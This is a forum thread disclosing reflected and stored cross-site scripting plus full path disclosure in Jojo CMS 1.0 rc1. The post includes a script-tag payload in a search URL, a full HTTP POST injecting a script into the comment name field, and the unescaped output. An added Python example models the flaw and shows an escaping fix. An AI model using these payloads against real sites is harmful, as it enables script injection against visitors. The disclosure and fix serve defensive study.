[UP] Jojo cms XSS and FPD

Started by s E t H, 12 November 2008, 20:56 PM

s E t H

It's a CMS that has only just been born, but since they didn't answer me I'm publishing it:




Name: Jojo cms
Website: http://www.jojocms.org/
Version: 1.0 rc1
Report: http://bugs.jojocms.org/details/task134
Report date: Wednesday, 05 November 2008, 12:52 UTC+13:00
Patched: no
Vulnerability type: XSS and FPD



Cross site scripting (non-persistent) and Full path disclosure:
http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E


Cross site scripting (persistent):
http://demo.jojocms.org/blog/1/welcome-to-jojocms/


HTTP HEADERS (I injected into the 'name' variable):

POST /blog/1/welcome-to-jojocms/ HTTP/1.1
Host: demo.jojocms.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://demo.jojocms.org/blog/1/welcome-to-jojocms/
Cookie: jojo=6cc641e1381c3201206cacfc9ce448ab; utma=119248274.775642559681182300.1225930562.1225930562.1225930562.1; utmb=119248274.1.10.1225930562; utmc=119248274; utmz=119248274.1225930562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
userid=&name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&email=asd%40asd.asd&website=http%3A%2F%2Fasd.net&anchortext=asd&captchacode=fhq&comment=asdsad&submit=Post+Comment+%3E%3E

RESULT:

<div class="comment" id="article-comment-wrap-2">

<h4><a href="http://asd.net" target="new" rel="nofollow"><script>alert("XSS")</script></a><span class="date"> - Nov 5, 2008</span></h4>
<p id="article-comment-2" class="comment-text">asdsad</p>
</div>
</div>




Sorry, my English is not good :(
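Added example (not Jojo CMS code, and not written by the post's author): a Python model of the comment sink shown above. It parses the POST body quoted in the request, reproduces the unescaped anchor from RESULT, and then shows the hardened rendering, where every user-controlled value goes through html.escape() before it reaches the page. The helper names, the safe_href() scheme check (general hardening for links built from user input, not something the post reports as vulnerable in Jojo) and the sample body are assumptions of this example. The same output escaping is the fix for the reflected /search/ case; the full-path-disclosure half of that URL is, in general, a PHP warning echoing the script's absolute path, which is prevented by not displaying errors to visitors.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed sample: the form body from the POST request quoted in the post above.
POST_BODY = (
    "userid=&name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E"
    "&email=asd%40asd.asd&website=http%3A%2F%2Fasd.net&anchortext=asd"
    "&captchacode=fhq&comment=asdsad&submit=Post+Comment+%3E%3E"
)


def parse_comment_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single-valued fields."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_comment_vulnerable(fields: dict, comment_id: int, date: str) -> str:
    """Interpolates the submitted fields verbatim, which is what the RESULT block shows."""
    return (
        f'<div class="comment" id="article-comment-wrap-{comment_id}">\n'
        f'<h4><a href="{fields["website"]}" target="new" rel="nofollow">'
        f'{fields["name"]}</a><span class="date"> - {date}</span></h4>\n'
        f'<p id="article-comment-{comment_id}" class="comment-text">{fields["comment"]}</p>\n'
        "</div>"
    )


def safe_href(url: str) -> str:
    """Hypothetical hardening helper (assumption): only http(s) links are allowed in href."""
    return url if urlparse(url).scheme.lower() in ("http", "https") else "#"


def render_comment_hardened(fields: dict, comment_id: int, date: str) -> str:
    """Same markup, but every attacker-controlled value is HTML-escaped before output."""
    esc = lambda s: html.escape(s, quote=True)
    return (
        f'<div class="comment" id="article-comment-wrap-{comment_id}">\n'
        f'<h4><a href="{esc(safe_href(fields["website"]))}" target="new" rel="nofollow">'
        f'{esc(fields["name"])}</a><span class="date"> - {esc(date)}</span></h4>\n'
        f'<p id="article-comment-{comment_id}" class="comment-text">{esc(fields["comment"])}</p>\n'
        "</div>"
    )


def contains_raw_script(markup: str) -> bool:
    """Crude check: does the output still carry a literal <script tag?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    fields = parse_comment_form(POST_BODY)
    print(render_comment_vulnerable(fields, 2, "Nov 5, 2008"))
    print(render_comment_hardened(fields, 2, "Nov 5, 2008"))
```

Running the block prints the comment twice: first with the injected script tag intact, exactly as the RESULT capture shows, then with it neutralised as `&lt;script&gt;alert(&quot;XSS&quot;)&lt;/script&gt;`. Escaping with quote=True matters because the name also lands between attribute-bearing tags; escaping only angle brackets would leave attribute breakouts open.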


Eazy

Aha, and what is FPD? Also, doesn't this belong in "Recopilacion de bugs de XSS/SQL i"?

s E t H

FPD: full path disclosure

It doesn't go in that post; I checked and it says that for CMSs you have to open a separate thread.

Eazy

Go sEtH =D, nice (I didn't know the acronym FPD) =D